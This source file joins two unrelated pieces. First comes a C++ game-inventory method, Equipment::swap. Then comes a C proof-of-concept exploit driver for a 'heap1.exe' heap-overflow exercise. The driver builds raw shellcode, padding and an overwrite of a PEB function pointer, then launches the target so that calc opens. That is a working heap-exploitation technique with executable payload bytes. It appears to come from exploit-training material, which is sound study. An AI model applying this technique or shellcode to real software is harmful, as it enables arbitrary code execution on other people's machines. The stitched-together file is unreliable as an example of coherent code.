	/// Replace whatever is currently equipped with `item`.
	///
	/// @param item        Item to put on; its equip type must match this slot's `_type`.
	/// @param resultItem  Out-parameter forwarded to undress(); presumably receives the
	///                    item that was taken off (see the commented-out assignment in the
	///                    original) — confirm against undress()'s definition.
	/// @return false when the equip types differ (nothing is changed), otherwise the
	///         result of dress(item).
	bool Equipment::swap(Item* item, Item** resultItem)
	{
		// Guard: a mismatched equip type is rejected before anything is touched.
		const bool typeMatches = (item->getEquipType() == _type);
		if (!typeMatches)
		{
			return false;
		}

		// Take off the current item first so the slot is free for the new one.
		if (isEquipped()) undress(resultItem);

		return dress(item);
	}
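     /*
      * Proof-of-concept driver for the "heap1.exe" exercise.
      *
      * Builds one command line of the form
      *     heap1 "<shellcode><58 x "DDDD"><4-byte value><3-byte value>"
      * and hands it to system(). The two run-time addresses (msvcrt!system and
      * ntdll!RtlEnterCriticalSection) are resolved with GetAddress() and patched
      * into the payload through fixupaddresses(); every other byte is a fixed
      * literal, so the result is tied to one specific process/DLL layout.
      *
      * Returns 0 after launching heap1.exe. If either lookup yields 0 it reports
      * the failure and returns printf()'s byte count (non-zero).
      *
      * GetAddress() and fixupaddresses() are defined elsewhere in the file.
      *
      * NOTE(review): buffer/tmp are unsigned char but are passed to
      * strcpy/strcat (char*). A C compiler warns about the sign mismatch; a C++
      * compiler rejects it. Left as-is because fixupaddresses()'s parameter
      * type is not visible here.
      */
     int main()
     {
            unsigned char buffer[300]="";
            unsigned int address_of_system = 0;
            unsigned int address_of_RtlEnterCriticalSection = 0;
            unsigned char tmp[8]="";
            unsigned int cnt = 0;

            printf("Getting addresses...\n");
            // Identifiers were hyphenated across lines in the extracted copy
            // (GetAd-dress, ad-dress_of_...); restored to the names declared above.
            address_of_system = GetAddress("msvcrt.dll","system");
            address_of_RtlEnterCriticalSection = GetAddress("ntdll.dll","RtlEnterCriticalSection");
            if(address_of_system == 0 || address_of_RtlEnterCriticalSection == 0)
                    return printf("Failed to get addresses\n");
            printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system);
            printf("Address of ntdll.RtlEnterCriticalSection\t= %.8X\n",address_of_RtlEnterCriticalSection);

            // Program name followed by the opening quote of the single argument.
            strcpy(buffer,"heap1 ");

            // Shellcode - repairs the PEB then calls system("calc");
            // The two 4-byte address slots are appended from tmp after
            // fixupaddresses() fills it. Because strcat stops at the first NUL,
            // an address containing a 0x00 byte silently truncates the payload;
            // tmp is also assumed to be NUL-terminated by fixupaddresses() - confirm.
            strcat(buffer,"\"\x90\x90\x90\x90\x01\x90\x90\x6A\x30\x59\x64\x8B\x01\xB9");
            fixupaddresses(tmp,address_of_RtlEnterCriticalSection);
            strcat(buffer,tmp);
            strcat(buffer,"\x89\x48\x20\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9");
            fixupaddresses(tmp,address_of_system);
            strcat(buffer,tmp);
            strcat(buffer,"\xFF\xD1");

            // Padding: 58 x "DDDD" = 232 bytes. With 4-byte address slots the
            // whole string is under 290 bytes, so buffer[300] is not overrun.
            while(cnt < 58)
            {
                    strcat(buffer,"DDDD");
                    cnt ++;
            }

            // Pointer to RtlEnterCriticalSection pointer - 4 in PEB
            // (hard-coded constant: only valid for the layout it was taken from)
            strcat(buffer,"\x1C\xF0\xFD\x7f");

            // Pointer to heap and thus shellcode
            strcat(buffer,"\x88\x06\x35");

            // Closing quote of the argument, then run the target.
            strcat(buffer,"\"");
            printf("\nExecuting heap1.exe... calc should open.\n");
            system(buffer);
            return 0;
     }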